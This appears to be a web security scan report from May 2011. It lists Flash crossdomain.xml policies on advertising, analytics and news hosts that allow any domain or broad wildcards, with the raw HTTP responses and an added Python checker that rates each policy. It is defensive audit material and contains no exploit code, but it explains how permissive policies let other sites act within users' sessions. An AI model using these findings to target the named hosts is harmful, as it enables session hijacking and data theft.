The Flash cross-domain policy (crossdomain.xml, served from the web root) tells Flash Player which origins' SWF content may make requests to the publishing host and read the responses. Flash Player attaches the user's cookies to those requests, so every domain the policy allows can act on the application as the user: if a logged-in user visits a site on an allowed domain, malicious content on that site can read and submit data within the user's authenticated session. The browser's own cross-origin requests are governed separately by CORS; the policy matters only for clients that honour it (Flash Player, and Silverlight as a fallback).

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain (a cross-site scripting flaw is enough) can be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

Review the domains the policy allows and decide whether the application can fully trust both the intentions and the security posture of every site that can be hosted on them. A wildcard such as *.example.com trusts every present and future sub-domain, including any that serve user-supplied content; domain="*" trusts the whole Internet and is only defensible for a host that serves nothing but public, unauthenticated content and sets no cookies of value. Check the attributes as well: secure="false" on a policy served over HTTPS lets SWFs loaded over plain HTTP read HTTPS responses (on a plain-HTTP policy it has no effect), and <allow-http-request-headers-from> lets the listed domains add custom request headers, which server-side code must not treat as evidence of a trusted client.
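A reviewer's check for the policies listed below, as an added Python example that is not part of the scan report: it parses a crossdomain.xml, rates it on the scanner's own High/Low scale, and flags the attributes that widen the grant. The three sample policies are constructed from findings 5.6, 5.8 and 5.16 (the 5.8 and 5.16 files are truncated in the report, so the samples close the document and keep only a few entries); classify_policy is an illustrative name, not a scanner API.

```python
"""Rate a Flash crossdomain.xml the way the findings in this section do.

Added example, not part of the scan report. The sample policies are copied
from findings 5.6, 5.8 and 5.16 of this report; where the report snips the
file the sample is closed off and shortened (marked below).
"""
import xml.etree.ElementTree as ET

# Finding 5.6 (by.optimost.com), complete as captured.
OPTIMOST = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>"""

# Finding 5.8 (engine.cmmeglobal.com); the report truncates the closing tag,
# which is restored here so the sample parses.
CMMEGLOBAL = """<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443,8080"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Finding 5.16 (googleads.g.doubleclick.net); three of the many entries.
GOOGLEADS = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
</cross-domain-policy>"""


def classify_policy(xml_text):
    """Return a dict summarising what the policy grants.

    severity follows the scanner's scale: "High" when any origin is allowed
    (domain="*"), "Low" when only wildcard sub-domains or named hosts are
    allowed, "Info" when nothing is granted. The external DTD named in the
    DOCTYPE is not fetched by ElementTree, so this runs offline.
    """
    root = ET.fromstring(xml_text.lstrip())
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")

    allowed = []        # domain patterns from <allow-access-from>
    insecure = []       # patterns that carry secure="false"
    ports = []          # (domain, to-ports) where a port list is given
    header_grants = []  # (domain, headers) from <allow-http-request-headers-from>
    for el in root.findall("allow-access-from"):
        dom = el.get("domain", "")
        allowed.append(dom)
        if el.get("secure", "true").lower() == "false":
            insecure.append(dom)
        if el.get("to-ports"):
            ports.append((dom, el.get("to-ports")))
    for el in root.findall("allow-http-request-headers-from"):
        header_grants.append((el.get("domain", ""), el.get("headers", "")))
    site_control = root.find("site-control")
    meta_policy = (site_control.get("permitted-cross-domain-policies")
                   if site_control is not None else None)

    if "*" in allowed:
        severity = "High"   # any origin may read responses with the user's cookies
    elif allowed:
        severity = "Low"    # wildcard sub-domains or named hosts only
    else:
        severity = "Info"

    return {
        "severity": severity,
        "any_origin": "*" in allowed,
        "wildcards": [d for d in allowed if d.startswith("*.")],
        "named_hosts": [d for d in allowed if d != "*" and not d.startswith("*.")],
        "secure_false": insecure,
        "to_ports": ports,
        "header_grants": header_grants,
        "meta_policy": meta_policy,
    }


if __name__ == "__main__":
    for name, policy in (("optimost", OPTIMOST), ("cmmeglobal", CMMEGLOBAL),
                         ("googleads", GOOGLEADS)):
        print(name, classify_policy(policy))
```

Run it against a live host with the policy text fetched from /crossdomain.xml; a "High" result on anything that sets session cookies, or a non-empty header_grants entry for "*", is what the findings below call out.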


5.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://ad.us.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.us.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://apps.shareholder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.shareholder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.shareholder.com

Response

HTTP/1.1 200 OK
Content-Length: 96
Content-Type: text/xml
Content-Location: http://apps.shareholder.com/crossdomain.xml
Last-Modified: Tue, 23 Oct 2007 19:01:53 GMT
Accept-Ranges: bytes
ETag: "dd25e02ca715c81:caff3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:07:08 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.4. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.5. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.6. http://by.optimost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 11:03:34 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.8. http://engine.cmmeglobal.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://engine.cmmeglobal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk. This policy goes further than the others in this section: a second rule extends the grant to ports 80, 443 and 8080, and <allow-http-request-headers-from domain="*" headers="*"/> lets a SWF from any origin attach arbitrary custom request headers, so nothing on this host may rely on a header's presence as a sign of a trusted caller.

Request

GET /crossdomain.xml HTTP/1.0
Host: engine.cmmeglobal.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"208-1304684854000"
Last-Modified: Fri, 06 May 2011 12:27:34 GMT
Content-Type: application/xml
Content-Length: 208
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443,8080"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain
...[SNIP]...

5.9. http://feeds.feedburner.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.feedburner.com

Response

HTTP/1.0 200 OK
Expires: Fri, 13 May 2011 10:57:47 GMT
Date: Thu, 12 May 2011 10:57:47 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.10. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 11:03:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.11. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.12. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 11:04:08 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.13. http://wt.o.nytimes.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wt.o.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wt.o.nytimes.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:82c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:04:37 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.14. http://add.my.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 10:57:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.15. http://dealbook.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dealbook.nytimes.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:54 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 17:05:31 GMT
ETag: "100a4d-169-4a303147fecc0"
Accept-Ranges: bytes
Content-Length: 361
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
...[SNIP]...

5.16. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1120

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.17. http://graphics8.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://graphics8.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: graphics8.nytimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1169
Content-Type: text/xml
Last-Modified: Wed, 21 Jul 2010 15:01:34 GMT
ETag: "491-4c470bce"
Cache-Control: private, max-age=63703
Date: Thu, 12 May 2011 11:02:58 GMT
Content-Length: 1169
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

5.18. http://markets.on.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://markets.on.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: markets.on.nytimes.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:03:52 GMT
Content-Length: 420
Content-Type: text/xml
Last-Modified: Mon, 14 Jul 2008 23:38:14 GMT
Accept-Ranges: bytes
ETag: "b87378afae6c81:3916"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
...[SNIP]...

5.19. http://media.ft.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.ft.com

Response

HTTP/1.1 200 OK
Content-Length: 1309
Content-Type: text/xml
ETag: "51d-4ba8ec18"
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

5.20. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 11 May 2011 19:28:23 GMT
Expires: Thu, 12 May 2011 19:28:23 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 55985

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
